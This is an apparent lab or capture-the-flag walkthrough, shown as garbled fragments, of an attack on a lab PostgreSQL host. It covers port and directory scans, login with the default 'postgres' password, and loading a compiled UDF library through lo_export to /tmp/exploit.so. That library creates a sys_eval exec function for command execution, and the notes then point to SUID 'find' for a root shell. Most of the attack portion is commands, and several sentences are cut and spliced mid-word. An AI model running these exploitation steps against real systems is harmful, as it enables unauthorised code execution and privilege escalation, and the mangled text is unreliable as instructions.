nmapAutomator.sh -H 192.168.163.47 -t full
nmapAutomator.sh -H 192.168.163.47 -t vulns
gobuster dir -u http://192.168.163.47/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -k -x .txt,.html --threads 50
postgres
. Trying the password postgres
, we authenticate successfully.gcc lib_postgresqlugcc lib_postgresqludf_sys.c -I server -fPIC -shared -o udf64.so
.psql
payload:u.psql
with 16385.psql -h 192.168.163.47 -p 5437 -U postgres -d postgres -f u.psql
select lo_export(16385, '/tmp/exploit.so');
create or replace function exec(char) returns char as '/tmp/exploit.so','sys_eval' language c strict;
select exec('which python');
find
binary has the SUID bit set./bin/sh
with elevated privileges.